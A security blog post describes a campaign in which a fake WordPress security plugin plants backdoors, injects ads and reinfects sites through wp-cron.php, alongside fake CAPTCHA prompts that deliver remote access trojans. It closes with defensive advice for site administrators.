top of page
Buscar

Booby trap in disguise: How a fake WordPress plugin hands over admin access to attackers

  • Foto del escritor: Javier Conejo del Cerro
    Javier Conejo del Cerro
  • 2 may
  • 3 Min. de lectura


In the vast ecosystem of WordPress, security is often treated as a plugin away. But when attackers mimic security itself, that assumption becomes a gateway to disaster.

A new campaign has been uncovered in which a malicious plugin, masquerading as a security enhancement, stealthily installs backdoors, hijacks admin control, and turns WordPress sites into vehicles for ad fraud, data theft, and persistent reinfection.


When security becomes the threat


At the heart of this campaign is a fake plugin named WP-antymalwary-bot.php. Other variants have surfaced under names like addons.php, wpconsole.php, and scr.php—all cleverly disguised to blend in with legitimate plugins.

Once installed, this plugin performs multiple malicious functions:

  • It hides itself from the WordPress admin dashboard.

  • It injects malicious PHP via the REST API into theme files.

  • It downloads additional payloads hosted on attacker-controlled infrastructure.

  • It reinfects the site using a companion file (wp-cron.php) that auto-executes on the next visit.

In essence, it’s a booby trap with a user-friendly face—one click and your entire site can be owned.


Who’s at risk?


This campaign targets a broad range of WordPress installations:

  • E-commerce platforms are particularly attractive for their payment data and customer credentials.

  • High-traffic blogs provide ad revenue potential.

  • Small and medium businesses, often lacking continuous monitoring or updates, are low-hanging fruit.

Victims are seeing their admin dashboards hijacked, ads injected without consent, payment data skimmed, and server resources drained to power attackers’ monetization schemes.

Even if the malicious plugin is removed, the threat doesn’t go away. A wp-cron.php backdoor is quietly reactivated the moment someone visits the site again.


The breach method: A double-edged approach


This isn’t just a one-trick pony. Alongside the fake plugin, the attackers deploy a multi-stage backdoor via fake CAPTCHA prompts. Once clicked, these deceptively familiar popups trigger downloads of Node.js-based remote access trojans (RATs).

These RATs:

  • Steal browser and session data.

  • Use SOCKS5 proxies to tunnel malicious traffic.

  • Execute commands remotely and persist across sessions.

  • Are tied to a Traffic Distribution System (TDS) known as Kongtuke, also tracked under names like LandUpdate808 and 404 TDS.

This approach combines plugin-level persistence with client-side deception, creating a layered infection that’s hard to detect and harder to remove.


The technical anatomy


  • REST API exploitation: Attackers leverage REST endpoints to insert PHP into the site theme’s header.php file.

  • Payload fetching: JavaScript ads and malware are retrieved from other compromised sites.

  • Reinfection: If the plugin is removed, the cron job file ensures the infection returns on the next visit.

  • Ad injection: Google AdSense scripts are embedded to generate fraudulent impressions and clicks, sometimes stealing legitimate revenue.

  • Fake updates: Some variants redirect users to fake browser update pages, triggering additional infections via MintsLoader or similar droppers.


The bigger picture: web skimming and beyond


This plugin campaign isn’t isolated. It’s part of a broader trend of web skimming and e-skimming, where attackers aim to steal credit card details, login credentials, cookies, and more. In some cases, attackers disguise their data exfiltration using:

  • Fake GIF images that are actually PHP reverse proxies.

  • Local session storage abuse.

  • Malicious proxies to reroute checkout data.

Together, these techniques illustrate a mature and multifaceted threat landscape focused on one thing: monetizing your WordPress environment behind your back.


How to protect your site


Here’s how to stay ahead of this increasingly sophisticated threat:

  1. Audit Plugins Regularly. Delete any unused or suspicious ones—especially if they don’t come from trusted sources.

  2. Harden REST API Access. Disable unused endpoints and monitor for unauthorized interactions.

  3. Inspect for wp-cron.php Manipulation. Any unexpected or repetitive cron behavior could signal reinfection.

  4. Block Outbound Requests to Unknown Domains. Especially those serving scripts or redirecting traffic.

  5. Review Theme and Core Files. Check header.php, footer.php, and functions files for hidden code injections.

  6. Train Teams on Fake CAPTCHA Risks. Ensure users know that unexpected popups—especially those mimicking CAPTCHA—should be treated with suspicion.

  7. Use File Integrity Monitoring. Automated systems can alert you to unauthorized file modifications.

  8. Implement WAFs and Rate Limiting. To slow down automated attempts to reinfect or exploit your platform.


The irony of this campaign is cruel: the very concept of a security plugin becomes the vector for compromise. But the lesson is clear—blind trust in surface-level security can be exploited, especially on platforms as widely used as WordPress.

Administrators and developers need to treat plugins with the same scrutiny as any third-party code. If it promises to “optimize” or “secure” your site, and you didn’t specifically install it from a trusted vendor, it may be doing the opposite.

Trust cautiously. Monitor frequently. And above all, audit relentlessly.



 
 
 

Kommentarer

bottom of page